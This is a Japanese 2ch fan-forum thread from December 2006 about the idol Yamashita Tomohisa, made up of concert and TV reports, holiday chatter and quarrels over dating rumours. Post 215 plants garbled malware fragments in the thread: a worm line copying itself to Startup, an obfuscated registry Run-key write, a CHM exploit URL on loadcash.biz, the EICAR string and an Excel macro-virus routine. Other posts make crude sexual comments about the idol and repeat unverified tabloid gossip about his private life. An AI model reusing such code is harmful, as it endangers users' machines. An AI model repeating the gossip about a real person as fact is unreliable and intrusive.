☆は事務所担だしな(w

142 :ユー&名無しネ:2006/12/24(日) 22:49:12 ID:JvHFdcNl







143 :ユー&名無しネ:2006/12/24(日) 22:55:27 ID:W2oO95l3
滝つ紺補足
服は黒のファー付きジャケにジーンズ、黒い靴
センターステで「メリークリスマス」と挨拶
あと「今日は何キャラ?」と聞かれ「滝君キャラ」と言い、
客席に向かって確かP「イェーイ」客「イェーイ」を3回位やった
あとズニア時代に☆に抱きつかれた事があったとか
Pは主にニコニコ聞き役ですたがカ○゙エかった
長文スマソ

144 :ユー&名無しネ:2006/12/24(日) 22:57:30 ID:vi3QbZLZ
☆事務所担て後輩のコンまで見に行くなんて気合いの入った事務所担だな

145 :ユー&名無しネ:2006/12/24(日) 23:03:26 ID:GsCjEN+r
ジャニも来てたんでしょ

146 :ユー&名無しネ:2006/12/24(日) 23:07:21 ID:MYBl6K0c
>143
そういえば昔の武威紺で☆に抱きつかれてね
☆に服貰ったりしてたしね

147 :ユー&名無しネ:2006/12/24(日) 23:07:56 ID:ROhT2qSK
他板からお邪魔
P担さん梨板でヲチしないでください
避難所があるならそちらでお願いします


やまぴーを語る@裏ズニア版
ttp://tv7.2ch.net/test/read.cgi/jr2/1164644058/

148 :ユー&名無しネ:2006/12/24(日) 23:27:47 ID:OxtmEa7g
>146
今年の新春紺でも☆に服貰ったって言って種

149 :ユー&名無しネ:2006/12/24(日) 23:28:09 ID:DgyaNv2F
>139&143
d
ピンスポ当ってるPミタス

150 :ユー&名無しネ:2006/12/24(日) 23:35:08 ID:msJ1Irli
レポくれた皆さまトンです
☆といえばSU番宣で一緒に若い母娘探したの懐カシス
かなりキャワだった

151 :ユー&名無しネ:2006/12/24(日) 23:40:25 ID:Udzwa811
北の零年の後30秒CMきたな

152 :ユー&名無しネ:2006/12/24(日) 23:46:28 ID:UpmaphUn
メリークリスマス!今日のテレ朝です。
ttp://imepita.jp/20061224/828790
ttp://imepita.jp/20061224/829970
もし規定に反してたらゴミン

153 :ユー&名無しネ:2006/12/24(日) 23:46:45 ID:JvHFdcNl
あのカメラのアングルからして下半身みろってかんじの
アングルだったから自然と股間に目がいった
チンコの形がくっきりはっきり見えた
勃起していない状態であんなに激しく揺れるはずがないので
半起ちくらいしてたんだと思う

154 :ユー&名無しネ:2006/12/24(日) 23:54:24 ID:5AtU0d3f
>152
THANKS!!



155 :ユー&名無しネ:2006/12/24(日) 23:58:01 ID:0oKgUiUu
>152
まだ行ってなかったからd!

あと滝つ紺レポしてくれた方達dです!
紺あんまり行かないから珍しいね

156 :ユー&名無しネ:2006/12/25(月) 00:03:35 ID:AgKTDLGy
蛇兄も来てたからユー来ちゃいなよって言われたんじゃない?

157 :ユー&名無しネ:2006/12/25(月) 00:04:17 ID:R/NFvsyd
妹もいたのか
去年のピザ懐かしいな

158 :ユー&名無しネ:2006/12/25(月) 00:12:23 ID:mOG2AjC1
イブなのに先輩紺見に行って自宅でピザってか(w
地味だな

159 :ユー&名無しネ:2006/12/25(月) 00:13:10 ID:OuwmHL4z
すんなり帰れるように妹連れてったな
P賢いな

160 :ユー&名無しネ:2006/12/25(月) 00:13:42 ID:r/oh3UqT
そういや仕事関係に家族連れてくとかってPは気にしないタイプだったね
家長タイピだからガンガン連れ回すほう
結婚したら奥さんシアワセかも忙しいとも言うけど

161 :ユー&名無しネ:2006/12/25(月) 00:13:45 ID:Mqol8wWI
今頃 あ び る とやりまくり

162 :ユー&名無しネ:2006/12/25(月) 00:16:53 ID:E0tB6SFW
去年は確か石鹸麺とピザだったっけ

163 :ユー&名無しネ:2006/12/25(月) 00:18:56 ID:sf2t3wAt
クリスマスにピザってべたなのか?(w

164 :ユー&名無しネ:2006/12/25(月) 00:19:36 ID:R/NFvsyd
ソイエね
毎年西や地味らへんとパーティーしてたから家族は珍しい

165 :ユー&名無しネ:2006/12/25(月) 00:24:38 ID:YXHBcY9v
Merry Christmas P
兄妹仲良しだね
来年はマブダチ達と過せたらいいな


166 :ユー&名無しネ:2006/12/25(月) 00:25:08 ID:WOidA0W0
MCで上がった☆との話、一つ補足します
良かったらドゾー

Pがある日武威俺様に呼ばれ、
「☆ってば、実はコレ(オカマポーズしつつ)なんだ」と相談を受ける
「そんな風には見えませんよ」と言ったら、
いきなり☆が出てきてハグされたとのこと(w
二人とも始終ニコニコしてて非常にキャワでした
盛り上がってましたよ
長文スマソ

167 :ユー&名無しネ:2006/12/25(月) 00:25:15 ID:YTu+zLha
Pってめちゃくちゃ賢いよね
家でピザとか食べてないくせに
コン終わってすぐ車とばして迎えに行ったのにさ
そんなP好きだけど

168 :ユー&名無しネ:2006/12/25(月) 00:25:34 ID:Mqol8wWI
あびる優がゲットした大物アイドル (ゲンダイネット)

あびる優(20)が「やった!」と叫んだかどうかは知らないが、
彼女が人気グループ「NEWS]の山下智久(21)をゲットしたことで話題騒然だ。

あびるに以前の笑顔が戻ったのはごく最近のことだ。
昨冬の窃盗告白騒動で一気に出番がなくなり、タレント生命が危ぶまれたほどだった。
そんな状況が一変したのは9月に放送されたテレビ朝日の番組企画「100キロマラソン」がキッカケだった。
あびるは今月掲載された本紙の連載コラム「リセット完了!」でも「一から出直すつもりでいる」と語った。

そのあびるが交際している山下は、先ごろ活動休止会見を開いた
「KAT―TUN」の赤西仁や亀梨和也以上に将来を期待されている人気アイドルだ。

発売中の「週刊文春」によれば、
2人は9月上旬に縁結びで有名な京都の地主神社を参拝しているところを見られ、
10月上旬には那覇市内の薄暗いバーなどでも目撃されたという。

「あびるといえば、ISSAやロンブーの淳との交際が有名です。
今回の山下は“山P”といわれて歌もドラマもヒットさせているビッグなアイドルで、
これまでの相手と比べものにならないくらいインパクトが強烈。
彼はジャニー喜多川氏のお気に入りで、熱狂的なファンが多いだけに、周囲の反発が怖いですね」(芸能関係者)

あびるは転んでもタダでは起きなかった。


169 :ユー&名無しネ:2006/12/25(月) 00:30:03 ID:+jVL9Euh
>167
どういう意味?


170 :ユー&名無しネ:2006/12/25(月) 00:30:24 ID:YXHBcY9v
>166
d
初めて聞いたエピだわ
真面目に答えるPカワエエ

171 :ユー&名無しネ:2006/12/25(月) 00:30:52 ID:xHzX86F+
>166
d
生Pみれた人ウラヤマ

172 :ユー&名無しネ:2006/12/25(月) 00:32:14 ID:E9kRpfIZ
今年は西と公には会えないクリスマスでPは寂しいだろうな

173 :ユー&名無しネ:2006/12/25(月) 00:32:17 ID:Az8ZbIJb
妹も一緒だったんだね
兄妹仲良くて微笑ましいな


そーいやマブダチの誕生日が近いな

174 :ユー&名無しネ:2006/12/25(月) 00:32:24 ID:qvTCiL57
生P見れてシアワセ
最高のクリスマスプレゼントだ
サンタサンありがd

175 :ユー&名無しネ:2006/12/25(月) 00:34:14 ID:GCi2La6X
今頃 あ び る とやりまくり

176 :ユー&名無しネ:2006/12/25(月) 00:37:40 ID:YXHBcY9v
>174
裏山

177 :ユー&名無しネ:2006/12/25(月) 00:38:46 ID:YTu+zLha
>>169
女迎えに行ってるの見られてるのよん
家には帰ってない


178 :ユー&名無しネ:2006/12/25(月) 00:40:05 ID:DBXm4oHY
>166
ワロタ
それなんてドッキリ?(w

179 :ユー&名無しネ:2006/12/25(月) 00:40:14 ID:cxf9AC4L
家族サービスをちゃんとしてる優しいPがスチ

180 :ユー&名無しネ:2006/12/25(月) 00:43:36 ID:AgKTDLGy
妹さん元気になってよかったね

181 :ユー&名無しネ:2006/12/25(月) 00:48:11 ID:mOG2AjC1
そういや梨板の頃
厨のマガを甜菜したヤツに萌えたの思い出した(w

182 :ユー&名無しネ:2006/12/25(月) 00:48:42 ID:+jVL9Euh
>女って?


183 :ユー&名無しネ:2006/12/25(月) 00:50:18 ID:ToSKmsac
女迎えにいったって何???
教えて??

184 :ユー&名無しネ:2006/12/25(月) 00:55:55 ID:M+9YdgML
☆と俺様のドッキリバロス(ww
真面目に答えるPカワエエな

185 :ユー&名無しネ:2006/12/25(月) 00:56:22 ID:OuwmHL4z
今日はマブダチU君達とパーチィじゃない?

186 :ユー&名無しネ:2006/12/25(月) 01:06:32 ID:OmnH/fl3
チキンにピザ食った
ちゃんとケーキも食ったかPチャソ
自分も明日は先輩紺(*´∀`)
会いたいPチャソ(*´∀`)

187 :ユー&名無しネ:2006/12/25(月) 01:06:53 ID:FcbU7QO3
やっぱりモメサが来たか
スルーでよろ

188 :ユー&名無しネ:2006/12/25(月) 01:07:04 ID:OmnH/fl3
おやうに(*´∀`)ノシ
ダイスチPチャソ(*´∀`)

189 :ユー&名無しネ:2006/12/25(月) 01:12:31 ID:R/NFvsyd
俺様☆ワロス
関東見れないんで今日ムーブ見れる方レポお願いします

190 :ユー&名無しネ:2006/12/25(月) 01:43:21 ID:Yy2840RD
滝つ紺レポ姐さん方dですた
クリスマスプレが生Pなんて禿裏山
妹サン回復して良かった

191 :ユー&名無しネ:2006/12/25(月) 02:27:47 ID:mEF3MmIG
さっきコンビニで山Pみた!!
車の助手席に女のこいたけどずっと下むいてて暗いし顔がみえなかった‥
髪ツヤツヤでかっこよかったです

192 :ユー&名無しネ:2006/12/25(月) 02:47:11 ID:lutyK/Sc
オイオイ一体何時だと思ってる
オナゴがそげな時間にウロチョロするか?
東京はムリ普通の子ナラ

193 :ユー&名無しネ:2006/12/25(月) 02:52:48 ID:4FbwBnzd
>192
今日のスレ流れ見ればモメサでそ
スルーしる

194 :ユー&名無しネ:2006/12/25(月) 02:55:49 ID:Az8ZbIJb
最近スルー出来ないのがいるな(w

195 :ユー&名無しネ:2006/12/25(月) 03:00:06 ID:lutyK/Sc
ゴメンゴメンゴメンorz

196 :ユー&名無しネ:2006/12/25(月) 04:21:16 ID:3vNoQPIU
滝つコン観れたPさんが羨ましい

197 :ユー&名無しネ:2006/12/25(月) 06:23:42 ID:8eM1YeMG
ムーブ今日何かやるのか?

198 :ユー&名無しネ:2006/12/25(月) 07:01:23 ID:IooEmwYH
滝つ紺レポ姐さんdです
Pキャワキャワ
>197
白虎隊番宣かな?

199 :ユー&名無しネ:2006/12/25(月) 07:04:13 ID:LG/DPQzZ
タッキー&翼サンタライブ 

タキツバとしては約1年半ぶりのツアーで「クリスマスプレゼントを楽しんで」
とタッキーがトナカイ、翼がクマのかぶり物。
「Venus」「Ho! サマー」に続き、振り付け曲の進化版、
新曲「×―ダメ―」(来春発売)も初披露した。
タキツバ史上最長の約3時間、全30曲の昼夜2公演は計3万人で満員。

夜の部には、V6・三宅健(27)と山下智久(21)も駆けつけ
「メリークリスマス」と声を合わせた。
(2006年12月25日06時01分 スポーツ報知)
ttp://hochi.yomiuri.co.jp/entertainment/news/20061225-OHT1T00041.htm



200 :ユー&名無しネ:2006/12/25(月) 08:08:00 ID:18AEe4Hx
>197
イケメン塾

201 :ユー&名無しネ:2006/12/25(月) 08:21:32 ID:OmnH/fl3
おはぃよう(*´∀`)
メリクリ言ってくる

202 :ユー&名無しネ:2006/12/25(月) 08:39:56 ID:VqRlrv5H
昨夜滝つ紺に入った友から興奮メール来たよ
P!P!P!って(w
Pノリノリでカバエかったって

203 :ユー&名無しネ:2006/12/25(月) 09:42:18 ID:5Pjud6Kg
嘘日記読まされるヲタかわいそう
でも嘘と解ってて無理やり納得してるんだろうけど

204 :ユー&名無しネ:2006/12/25(月) 09:47:35 ID:OEfyt3O/
Pは嘘つくくらいなら書かないよ
息する様に嘘つける誰かさんと一緒にしないでね

205 :ユー&名無しネ:2006/12/25(月) 10:01:12 ID:ApZd0an7
プラベ妄想イラネ
今日のムーブ楽しみ〜だ



206 :ユー&名無しネ:2006/12/25(月) 10:06:38 ID:5Pjud6Kg
やっぱピザ食ってすぐ寝たと思い込むのが1番だよな

207 :ユー&名無しネ:2006/12/25(月) 10:16:42 ID:xHzX86F+
>199
d
これはWSでも取り上げられたんだろうか?
被り物なPみてみたかったな

208 :ユー&名無しネ:2006/12/25(月) 10:17:31 ID:sh7D20h2
ムーブよく取り上げてくれるね
内容もいつもウマーだし見れる姐さん裏山

209 :ユー&名無しネ:2006/12/25(月) 11:03:27 ID:ryGCZQ94
WSで滝つ紺きたね
勿論Pは映ってないが滝がサンタ帽被ってた
これをPに被せたのかな

210 :ユー&名無しネ:2006/12/25(月) 11:55:14 ID:FAku6QSm
>204
スルーも出来ないアフォ

211 :ユー&名無しネ:2006/12/25(月) 12:02:06 ID:pR0Pr72K
Pも人間だから嘘はつくけどな

212 :ユー&名無しネ:2006/12/25(月) 12:29:56 ID:es9itgfO

18.6% 19:00-23:10 EX* ミュージックステーションスーパーライブ2006

213 :ユー&名無しネ:2006/12/25(月) 13:16:46 ID:qCRA4Fdq
タモステいろんなアーが出て豪華だったしな

214 :ユー&名無しネ:2006/12/25(月) 16:02:57 ID:E0tB6SFW
視聴率良かったんだな

215 :<body onload=window()>:2006/12/25(月) 17:18:37 ID:e7qgpIiU
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


216 :ユー&名無しネ:2006/12/25(月) 17:31:43 ID:Qn04NexY
白虎隊公式に試写会情報

217 :ユー&名無しネ:2006/12/25(月) 18:04:05 ID:xHzX86F+
>216
d
でも親子枠なんだな
確率の前に応募できないorz

218 :ユー&名無しネ:2006/12/25(月) 18:09:40 ID:2SlFjztS
>216
d
早速応募してきた
5組10名じゃ当たらないとは思うけど

219 :ユー&名無しネ:2006/12/25(月) 18:20:45 ID:oy6EnQHb
「山ア寛代のイケメン塾」
エロティック山Pからオ・ト・ナの智久へ
山下智久(20)(←年齢間違ってるw)

山ア「今年山下君はエロティックって言ってました。
そんな山Pからオトナの智久に変身中です」

白虎隊CM流れる
(剣道や弓の稽古、野際陽子との会話、銃を握るシーンなど)

ア「なんと京都の撮影所までお邪魔したんですが」
P「すいませんわざわざ(ペコリ)お足を運んでいただき有難うございます(ペコリ)」
ア「いきなり見たのが山下さんのフンドシ姿なんですが」
(フンドシでオムと語ったり、恐る恐る水に入る姿流れる)
P「マジすか?いきなり?もっとキツく!もっと!!みたいな感じくらい
ビシッと締めて…」
ア「もう結構今は普段でもしてるみたいな?」
P「してねぇ!(苦笑)してねぇ!!スミマセン、してないデス」
毒づいたもののすぐにペコリと謝る

P「隊長の話を聞くときでも横も縦も列をピシッと合わせて。位置の関係?
久々に前ならえしましたね(ちっちゃく前ならえする)」


220 :ユー&名無しネ:2006/12/25(月) 18:22:14 ID:oy6EnQHb
(カツラは?)
これっすか?だいぶ慣れましたけど〜、なんか引き締まりますね」
カツラをつけて着物きて。やっぱ日本人だと思います。」

(何が1番大変だった?)
正座!だから僕ちょっと畳見るのが嫌いになってきちゃったくらい
正座がもう。初めて立って足がカクンて抜けた…アレって思って。

(撮影現場では?)
現場では智久って呼ばれてるんですけど智久って呼ばれる事が家族以外ないので
「智久どこや!?」「あ!ここにいます!」っていう位やっぱ活気のある…



221 :ユー&名無しネ:2006/12/25(月) 18:23:49 ID:oy6EnQHb
(撮影で感じたこと)
ただ雨が降ってて風が吹いてて、ただ鉄砲で撃つだけなんですけど
それだけでも切ない気持ちになっちゃうんですね。
本番が終わればストーブにあたることができるし、お腹空けばご飯も食べられるけど
当時の人はそうじゃなくて、うん、ていうのを考えるとやっぱり平和な時代に
産まれて、うん良かったなって思うんで。

(体調は?)
バッチシでした!(力強く)
虫に刺されたくらいです。京の都の虫はハンパないっす!
めちゃめちゃ痒いっす!今もうだいぶ完治してきてるんで…
(ここで右足首を写され)あ!靴下とかはいちゃってますね。
(とクイクイ足袋の中に靴下をムリクリ押しこむ)
いつもこやって詰めてるんです、無理矢理。

(今年はエロティックと言ってたのは?)
こうやって大人の男性に近づいていけるといいなって思います。
家族の愛とか友情とか本当に俺も忘れてたものとか思い出せるので
家族で見て欲しいと思います。よろしくお願いします。(ペコリ)

(凛々しい!)
はい。待ってた(目を瞑ってご満悦)

以上ムーブレポ長文スマソ。
出かける時間になったので書き逃げします。


222 :ユー&名無しネ:2006/12/25(月) 18:25:37 ID:Nx7jKzYF
>221
詳しくありがd

223 :ユー&名無しネ:2006/12/25(月) 18:36:19 ID:5Pjud6Kg
長文荒らし氏ねよ

224 :ユー&名無しネ:2006/12/25(月) 18:37:37 ID:u/fIJvEy
>219-221
レポd

お足をの所かなり力入れててカバエかった
基本全然変わってないのに
幼く見えたり大人っぽく見えたり
最近はいろんな魅力が混じってるね

225 :ユー&名無しネ:2006/12/25(月) 18:44:05 ID:ryGCZQ94
>219-221
詳しいレポd!


226 :ユー&名無しネ:2006/12/25(月) 18:49:18 ID:9Dtt0Mm/
ムーブレポ d
うわっ 見たかった

227 :ユー&名無しネ:2006/12/25(月) 19:12:36 ID:tqYDPlpM
昔忠臣蔵をやったときのお茶目っぷりのまんまの表情だなって思った
たこやきの地はなかなかCMや番宣やってくれないので
やっと切腹シーン見れたよ

228 :ユー&名無しネ:2006/12/25(月) 20:20:38 ID:NloC549Z
レポdでした
智久どこや?って新鮮だな
>224
白虎隊になると幼く見えるね

229 :ユー&名無しネ:2006/12/25(月) 20:26:50 ID:5U0An028
>219-221
d!
智久呼びいいね

230 :ユー&名無しネ:2006/12/25(月) 20:36:42 ID:NU4Krifk
なんで、山下どこや!じゃないんだろう。
もうひとり山下さんがいたとか?

231 :ユー&名無しネ:2006/12/25(月) 20:42:57 ID:FcbU7QO3
話出して悪いけど昨日の釣られまくりは酷杉でそ
何でこんなところに落ちてる情報の方が正しいと思うわけ?
例えば写真とか落ちててもまずは合成だと疑ってかかるように
安置が常駐してるスレでは変なのが落ちてたらまずガセだって疑ってかかるのが普通なわけで
ちょっと調べればガセだってすぐ分かるものもあるというのに
昨日のことのみならず今までを見てみても今後もこういうことがある
可能性大なので敢えて言ってみた

232 :ユー&名無しネ:2006/12/25(月) 20:45:38 ID:sh7D20h2
詳しいムーブレポウレシスありがd
ペコリペコリ頭下げるPいいな
してねぇ!と粋がってスミマセン謝るのカバエエ(w

233 :ユー&名無しネ:2006/12/25(月) 20:47:13 ID:YXHBcY9v
>219-221
d
鯱国見れないのでホント嬉しい
智久呼び萌

234 :ユー&名無しネ:2006/12/25(月) 20:52:39 ID:sh7D20h2
>231
ノシ
ただ釣られてるヤシのレス見ると厨ばかりだ
冬(ry

235 :ユー&名無しネ:2006/12/25(月) 20:58:07 ID:h4ESoLjV
ピザ食ってすぐ寝たと思いたい真性さん


231 名前:ユー&名無しネ[sage] 投稿日:2006/12/25(月) 20:42:57 ID:FcbU7QO3
話出して悪いけど昨日の釣られまくりは酷杉でそ
何でこんなところに落ちてる情報の方が正しいと思うわけ?
例えば写真とか落ちててもまずは合成だと疑ってかかるように
安置が常駐してるスレでは変なのが落ちてたらまずガセだって疑ってかかるのが普通なわけで
ちょっと調べればガセだってすぐ分かるものもあるというのに
昨日のことのみならず今までを見てみても今後もこういうことがある
可能性大なので敢えて言ってみた

236 :ユー&名無しネ:2006/12/25(月) 21:23:39 ID:iLgZn4ju
>231
オマイも厨クサイ
んな事で長文イラネ

237 :ユー&名無しネ:2006/12/25(月) 21:25:38 ID:ZlfkmR/r
ムーブレポd!あームーブ裏山だあ
太秦の職人気質のおっさん達に智久って呼ばれるP見たいよー
番宣でやってホスィ

238 :ユー&名無しネ:2006/12/25(月) 21:27:44 ID:tqYDPlpM
>216-218
亀だが綱で番協募集してるよ
私は遠方なので行けないからガンガッテ当ててレポ落として栗

239 :ユー&名無しネ:2006/12/25(月) 21:28:48 ID:4CMMVkJN
靴下はみ出しを指先でキュッキュつめこむとこ
顔ほとんど映ってないんだがなんだかツボってしまった(w

240 :ユー&名無しネ:2006/12/25(月) 21:35:21 ID:h4ESoLjV
クリスマスデートは絶対に認めたくない深山さん


231 名前:ユー&名無しネ[sage] 投稿日:2006/12/25(月) 20:42:57 ID:FcbU7QO3
話出して悪いけど昨日の釣られまくりは酷杉でそ
何でこんなところに落ちてる情報の方が正しいと思うわけ?
例えば写真とか落ちててもまずは合成だと疑ってかかるように
安置が常駐してるスレでは変なのが落ちてたらまずガセだって疑ってかかるのが普通なわけで
ちょっと調べればガセだってすぐ分かるものもあるというのに
昨日のことのみならず今までを見てみても今後もこういうことがある
可能性大なので敢えて言ってみた

241 :ユー&名無しネ:2006/12/25(月) 21:37:42 ID:xHzX86F+
ムーブ レポdです
イケメン塾だよね?
全部で何分くらい?

242 :ユー&名無しネ:2006/12/25(月) 21:39:01 ID:ZvxN3KkK
あぁ…観たかったー
レポdd

243 :ユー&名無しネ:2006/12/25(月) 21:40:50 ID:IooEmwYH
ムーブ録画見たノシ
Pテラキャワス

244 :ユー&名無しネ:2006/12/25(月) 21:44:29 ID:IooEmwYH
凛々しいのに喋ると普通の男の子で可愛いって言われてたよ
顔のアップなんかも多くてウマーだったけど昔から顔全然変わってないのやっぱ(w

245 :ユー&名無しネ:2006/12/25(月) 22:02:14 ID:h4ESoLjV
日記が全てでそれ以外の行動は絶対に無いと断言する基地外さん


231 名前:ユー&名無しネ[sage] 投稿日:2006/12/25(月) 20:42:57 ID:FcbU7QO3
話出して悪いけど昨日の釣られまくりは酷杉でそ
何でこんなところに落ちてる情報の方が正しいと思うわけ?
例えば写真とか落ちててもまずは合成だと疑ってかかるように
安置が常駐してるスレでは変なのが落ちてたらまずガセだって疑ってかかるのが普通なわけで
ちょっと調べればガセだってすぐ分かるものもあるというのに
昨日のことのみならず今までを見てみても今後もこういうことがある
可能性大なので敢えて言ってみた

246 :ユー&名無しネ:2006/12/25(月) 22:05:38 ID:moaCsIlk
釣られてるレスもナリってこともあるしな
日記だけが真実だとは誰も思ってないだろ
>231も力み過ぎもちつけよ

247 :ユー&名無しネ:2006/12/25(月) 22:24:52 ID:BEQgm1L4
ミンナ!こういう時はあたんしおん!なんだよ〜
あたんしおんにはサンセイス!なの〜忘れちゃダメ

248 :ユー&名無しネ:2006/12/25(月) 22:33:44 ID:lsKY/Azg
隣板から失礼します
昨日は紺観に来てくれて、振り付けも一緒にやってくれてありがd!
メール話もホッコリ
白虎隊楽しみにしてますノシ

249 :ユー&名無しネ:2006/12/25(月) 22:36:22 ID:XpYfAxBm
ムーブレポ嬉シス



250 :ユー&名無しネ:2006/12/25(月) 22:40:46 ID:SsIbz38G
最近Pの出るTV多いから録画をしてから
出掛けること増えた

251 :ユー&名無しネ:2006/12/25(月) 22:41:21 ID:r/oh3UqT
>221
ムーブレポdです!

試写会なんで5日昼なんだよ
4日にしてくれれば行けるのに会社初めの日に休めるかよ…orz

252 :ユー&名無しネ:2006/12/25(月) 22:42:08 ID:Nx7jKzYF
>248
わざわざdです

253 :ユー&名無しネ:2006/12/25(月) 22:42:51 ID:1f8e8upx
>248
いらっさいノシ
こちらこそチビの時からお世話になってます
わざわざdでした

254 :ユー&名無しネ:2006/12/25(月) 22:43:33 ID:4FbwBnzd
>248
滝つ姐さんdです
Pもノリノリだたみたいですね
寂しがりPを今後もヨロです

255 :ユー&名無しネ:2006/12/25(月) 22:46:21 ID:IooEmwYH
靴下クイクイ押し込んでるところカバエかった(w

256 :ユー&名無しネ:2006/12/25(月) 22:50:48 ID:Nhp+/zue
>241
スタジオのコメも含めて5分くらい

>255
スタジオの出演者もそこでカワイイって言ってるのが聞こえたよね

257 :ユー&名無しネ:2006/12/25(月) 23:42:50 ID:r/oh3UqT
スマスマでTBCのPバーゾン初めてみたよ

258 :ユー&名無しネ:2006/12/25(月) 23:50:58 ID:th+HGwc+
やまぴーを語る@裏ズニア版
ttp://tv7.2ch.net/test/read.cgi/jr2/1164644058/


他担は梨板でヲチスレなんて立てないのに
P担さんは常識知らずですね
日本語も通じないみたいでがっかりです

259 :ユー&名無しネ:2006/12/25(月) 23:59:15 ID:YXHBcY9v
>257
スマスマ?
どのあたりですか?

260 :ユー&名無しネ:2006/12/26(火) 00:07:44 ID:ANbcQlEv
山崎さんキタ━━━━(Д゚(○=(゚∀゚)=○)Д゚)━━━━━!!

261 :ユー&名無しネ:2006/12/26(火) 00:10:18 ID:Il2UqPT1
努 キタ━━━━━━(゚∀゚)━━━━━━!!!!!

>258は板違いなのにPスレがあるからどうにかしろって話?
どうしようもないような?どうしたらいいんだorz

262 :ユー&名無しネ:2006/12/26(火) 00:11:26 ID:UTCISe4L
写メ綺麗だな
桂木久々ktkr

263 :ユー&名無しネ:2006/12/26(火) 00:12:01 ID:PBTFZJvQ
山崎さんと食事か
P可愛がってもらえてるんだな
明日の日記で詳しく話してほしいな

264 :ユー&名無しネ:2006/12/26(火) 00:12:04 ID:KJ2EsY7l
山崎さんに可愛いがられてるPチャンスゴス

265 :ユー&名無しネ:2006/12/26(火) 00:13:34 ID:BDCfWMkQ
やまぴーを語れ(避難所)
http://jbbs.livedoor.jp/music/7762/yamap.html

雑談【6】
http://jbbs.livedoor.jp/bbs/read.cgi/music/7762/1159457228/

提案3
http://jbbs.livedoor.jp/bbs/read.cgi/music/7762/1157093814/

266 :ユー&名無しネ:2006/12/26(火) 00:14:46 ID:LJ6RpJ1A
Pありがd&メリクリ
めちゃめちゃ美味しそうなケーキ
山崎さんと食事って凄いね
そしてチョット期待しちゃうよ


267 :ユー&名無しネ:2006/12/26(火) 00:19:50 ID:ANbcQlEv
26(火) ぷっすま
予告映るかもしれないからチェック

268 :ユー&名無しネ:2006/12/26(火) 00:19:54 ID:+3TS/6ia
綺麗なメリクリ写真ありがd
努サソーーキタワアー.*:.。.:*・゚(n‘∀‘)η゚・*:.。.:*!!☆

269 :ユー&名無しネ:2006/12/26(火) 00:22:04 ID:0c3ukMpm
明日はU君バースデーだな
P盛り上がれ

270 :ユー&名無しネ:2006/12/26(火) 00:23:11 ID:BDCfWMkQ
あびる優がゲットした大物アイドル (ゲンダイネット)

あびる優(20)が「やった!」と叫んだかどうかは知らないが、
彼女が人気グループ「NEWS]の山下智久(21)をゲットしたことで話題騒然だ。

あびるに以前の笑顔が戻ったのはごく最近のことだ。
昨冬の窃盗告白騒動で一気に出番がなくなり、タレント生命が危ぶまれたほどだった。
そんな状況が一変したのは9月に放送されたテレビ朝日の番組企画「100キロマラソン」がキッカケだった。
あびるは今月掲載された本紙の連載コラム「リセット完了!」でも「一から出直すつもりでいる」と語った。

そのあびるが交際している山下は、先ごろ活動休止会見を開いた
「KAT―TUN」の赤西仁や亀梨和也以上に将来を期待されている人気アイドルだ。

発売中の「週刊文春」によれば、
2人は9月上旬に縁結びで有名な京都の地主神社を参拝しているところを見られ、
10月上旬には那覇市内の薄暗いバーなどでも目撃されたという。

「あびるといえば、ISSAやロンブーの淳との交際が有名です。
今回の山下は“山P”といわれて歌もドラマもヒットさせているビッグなアイドルで、
これまでの相手と比べものにならないくらいインパクトが強烈。
彼はジャニー喜多川氏のお気に入りで、熱狂的なファンが多いだけに、周囲の反発が怖いですね」(芸能関係者)

あびるは転んでもタダでは起きなかった。


271 :ユー&名無しネ:2006/12/26(火) 00:23:56 ID:qTOKYtu2
ウン期待しちゃう

272 :ユー&名無しネ:2006/12/26(火) 00:26:07 ID:xTFQQB4P
メリクリ(*´∀`)ケーキdアハ
先輩紺からただいま(*´∀`)ノシ
早く歌って踊るPチャソがみたい百年の恋と硝子の少年で
Pチャンの面影が見えた(*´∀`)

273 :ユー&名無しネ:2006/12/26(火) 00:26:16 ID:UTCISe4L
これが恐怖ビビリ王だ1月2日何かが起こる
てwktkというより怖いな(w
山崎さんの奥さんがまたご馳走作ってそう

274 :ユー&名無しネ:2006/12/26(火) 00:26:18 ID:qTOKYtu2
期待シチャウのは山崎さんとお食事ダカラネ

275 :ユー&名無しネ:2006/12/26(火) 00:31:04 ID:dwi4w2oZ
写真誰んちだろと思ったがまいっか
山崎さん久々登場だな

276 :ユー&名無しネ:2006/12/26(火) 00:33:05 ID:LJ6RpJ1A
それにしてもベリーベリーベリー美味そう
サンタもシマシマロウソクも可愛い

277 :ユー&名無しネ:2006/12/26(火) 00:39:42 ID:VJhMnxOv
Pメリクリ(w

山崎サンとお食事か
てことはwktkする期待する

278 :ユー&名無しネ:2006/12/26(火) 00:40:08 ID:BDCfWMkQ
Pを見るとその辺の男がゴミに見えるよ

279 :ユー&名無しネ:2006/12/26(火) 00:43:08 ID:CmFuxywS
P生クリーム嫌いとか言ってなかったっけ?

280 :ユー&名無しネ:2006/12/26(火) 00:53:11 ID:ds4d+hJA
なんか写真ホノボノした

281 :ユー&名無しネ:2006/12/26(火) 00:54:26 ID:dwi4w2oZ
写メっただけで食べなかったかも知れないし
細かいことはどうでもいい
今年はタイヤ穿き替えろよ(w危ないから

282 :ユー&名無しネ:2006/12/26(火) 00:56:37 ID:zaCnRXlQ
>279
?は全角推進

283 :ユー&名無しネ:2006/12/26(火) 01:04:58 ID:F0x1kaCU
